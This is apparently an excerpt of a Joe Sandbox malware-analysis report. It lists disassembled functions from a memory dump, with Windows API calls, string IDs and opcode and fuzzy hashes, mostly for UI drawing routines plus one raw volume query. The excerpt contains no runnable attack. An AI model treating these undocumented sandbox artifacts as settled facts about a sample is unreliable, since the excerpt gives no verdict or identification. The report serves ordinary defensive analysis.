                                                                                                                                                                                                                                                                                    • API ID: Rect$MessageSend$Invalidate$ClientCursorScreen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2454936240-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                    • Instruction ID: e3b87b86549111153a689a6de42a5e443b1792048b086b4c3e38e8d95830a062
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3413BB1208301AFC310DF65D884EABB7E9FBC8710F004A2EF59987250E775E945CBA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 004318DA
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004319AA
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00431B90
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431BCE
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00431BEF
                                                                                                                                                                                                                                                                                    • AlphaBlend.MSIMG32(?,?,?,?,00000003,?,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,00F0F0F0), ref: 00431C5D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$AlphaBitmapBlendCopyFrameObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: Z
                                                                                                                                                                                                                                                                                    • API String ID: 54210234-1505515367
                                                                                                                                                                                                                                                                                    • Opcode ID: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                    • Instruction ID: 0792d4e533d00b1b26a73fc7749f663e28f4755597dc11c0d4e9561af80c2fe6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DC112716083418FC724DF69C984A5BBBE5AFC8704F108A2EF58987391DB74E909CB96
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401059$3401060$3401061$3401062$<a>%s</a>
                                                                                                                                                                                                                                                                                    • API String ID: 0-135031447
                                                                                                                                                                                                                                                                                    • Opcode ID: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                    • Instruction ID: 570f8eb3785bc855bef0c474daa2501289258084391a13b0a6423d05570a55ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D81D7717543005BC714EF218C42BDA33A4AF88714F14853FBA0D6B2C6DBB9E985879E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00497DC0), ref: 00401305
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,?,?,?,00497DC0), ref: 00401316
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                    • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                    • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                    • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                    • Opcode ID: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                    • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00465A5F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00465A78
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00465B27
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00465B49
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00465B61
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00465BA5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$ClientMessageParentReleaseSendWindow
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 330964712-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction ID: b1a5f572caf67006923a9ef52c219ce68de25ddbd2c2a7f7615237fc757273c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0510371600B019FD324DF79C889BA7B3E9BF88704F008A1DE5AA97281DB74B854CF59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 00454A46
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000), ref: 00454ABC
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090064,00000000,00000000,00000340,00000060,00000003,00000000), ref: 00454AE8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AFA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandleInformationVolume
                                                                                                                                                                                                                                                                                    • String ID: C:\$NTFS$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1233574911-974996950
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction ID: 7a7ffa21548745985fbbbea45252e330d1802da0f0ea7318edadfa9cc625902c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE311D71608300AFE320CF64D885B6BB7F8AF88714F400A2DF549D7291E7B5E584CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: Selected$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3404155819
                                                                                                                                                                                                                                                                                    • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                    • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 00420AB8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000005,00000000), ref: 00420ACA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001207,00000006,?), ref: 00420AE9
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00420AFB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000005), ref: 00420B28
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00420B37
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 1925248871-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction ID: f6960d58b42149bb48d8704757dd9bea0314272504ba79e98d6d7c5fe9983159
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC115E717403057BE235EA79CC86FA773E9AB88B40F41491CF285EB1C1DAB9F9448B54
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00453297
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00453332
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004533BF
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004533E6
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004534A6
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004534B7
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004534BE
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004534C5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearString$FreeInit$Alloc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1906771560-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1071774122-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                    • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042EF55
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF88
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 0042EFF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000000), ref: 0042F0A9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a8da6b0a3b4820785d32a6e99519bf5ba1baf34d33d3eec9a517c422a0835b5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51E2716083109BD720DF25E981B5BB7F4FB88710F800A7EF94997392D775E8058B9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    • Opcode ID: 9be5c9983a3a9708faa268995b4b90c9b7baec8167950ea82a948411bb73ca8a
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be5c9983a3a9708faa268995b4b90c9b7baec8167950ea82a948411bb73ca8a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00503601
                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00503609
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00503692
                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005036BD
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00503712
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                    • Opcode ID: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                    • Instruction ID: 821d69273ac79cc1eb4721babc24db78b3a3adc9ff51cf5d9205813b4df27ecf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2418234A00209AFCF10DF69C885A9EBFA9FF85314F148166E8195B3D2D732DB15CB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(113262B6), ref: 00423545
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401016
                                                                                                                                                                                                                                                                                    • API String ID: 390680170-1597404659
                                                                                                                                                                                                                                                                                    • Opcode ID: 2a6a59c1264529a27330a631af8e172e3aa2cb4d668187ed554c8fb1c174a488
                                                                                                                                                                                                                                                                                    • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a6a59c1264529a27330a631af8e172e3aa2cb4d668187ed554c8fb1c174a488
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,113262B6,75C05540,?,?,00421AA0,113262B6), ref: 004242B3
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                    • String ID: %s: %I64u $3401050$3401080
